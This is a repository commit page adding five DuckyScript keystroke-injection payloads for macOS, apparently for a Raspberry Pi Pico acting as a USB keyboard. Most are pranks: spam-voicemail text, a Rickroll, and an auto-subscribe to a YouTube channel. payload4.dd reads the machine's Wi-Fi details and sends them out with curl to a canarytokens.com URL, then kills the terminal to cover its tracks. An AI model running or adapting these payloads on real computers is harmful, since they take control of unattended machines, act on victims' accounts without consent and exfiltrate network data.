DocRock3r/pico-ducky
1
0
Fork 0
mirror of https://github.com/dbisu/pico-ducky.git synced 2025-12-08 13:34:57 +00:00
Code Issues Packages Projects Releases Wiki Activity

meow!

Browse Source
This commit is contained in:
Alex Lynd
2022-01-06 01:22:57 -07:00
committed by GitHub
parent 0c0dac3b39
commit c7e1b198fc
5 changed files with 45 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
payload.dd Normal file
View File

@@ -0,0 +1,8 @@
REM This is the "Rush" Payload, it asks if you want to extend your car's warranty on MacOS (taken from voicemail transcript) by @skicka
GUI SPACE
DELAY 500
STRING terminal.app
ENTER
DELAY 1000
STRING say "Hi, this is Melanie and I'm giving you a call from the dealer service center. We recently noticed your car's extended warranty would expire and wanted to provide you with one final courtesy call before your warranty expires, June 10th, your warranty coverage becomes voided. This would make you financially responsible for all Service Repairs. If you wish to extend or reinstate your car's warranty, press for now, or press 9 to be continued coverage and discontinue receiving these reminders." && kill -9 $(ps -p $PPID -o ppid=)
ENTER

7
payload1.dd Normal file
View File

@@ -0,0 +1,7 @@
REM Extended Warranty Reminder, opens TextEdit on MacOS and types contents of spam voicemail, by @Skickar 2022
GUI SPACE
STRING textedit
ENTER
DELAY 1000
CTRL N
STRING Hi, this is Melanie and I'm giving you a call from the dealer service center. We recently noticed your car's extended warranty would expire and wanted to provide you with one final courtesy call before your warranty expires, June 10th, your warranty coverage becomes voided. This would make you financially responsible for all Service Repairs. If you wish to extend or reinstate your car's warranty, press for now, or press 9 to be continued coverage and discontinue receiving these reminders.

9
payload2.dd Normal file
View File

@@ -0,0 +1,9 @@
REM Quick Rickroller, opens Rickroll video on MacOS via Terminal and plays by @Skickar 2022
GUI SPACE
STRING terminal.app
ENTER
DELAY 1000
STRING open "https://youtu.be/dQw4w9WgXcQ"
ENTER
DELAY 2000
SPACE

13
payload3.dd Normal file
View File

@@ -0,0 +1,13 @@
REM Quick Hak5 Channel Subscriber, opens hak5 subscribe link via terminal, tabs twice, and hits enter to subscribe on MacOS by @Skickar 2022
GUI SPACE
STRING terminal.app
ENTER
DELAY 1000
STRING open "https://www.youtube.com/c/hak5?sub_confirmation=1"
DELAY 500
ENTER
DELAY 4000
TAB
TAB
ENTER
ENTER

8
payload4.dd Normal file
View File

@@ -0,0 +1,8 @@
REM Wi-Fi Network setting exfil, takes current network information & sends it as user agent to a canary token, by @Skickar 2022
GUI SPACE
STRING terminal.app
ENTER
DELAY 2000
STRING curl --silent --output /dev/null --user-agent $(airport --getinfo | sed 1d | xargs | tr -d ' ' | tr -d '-') http://canarytokens.com/terms/tags/9sh0p7if7ei3j6z9mfwvrt9d9/post.js && wait && kill -9 $(ps -p $PPID -o ppid=)
DELAY 500
ENTER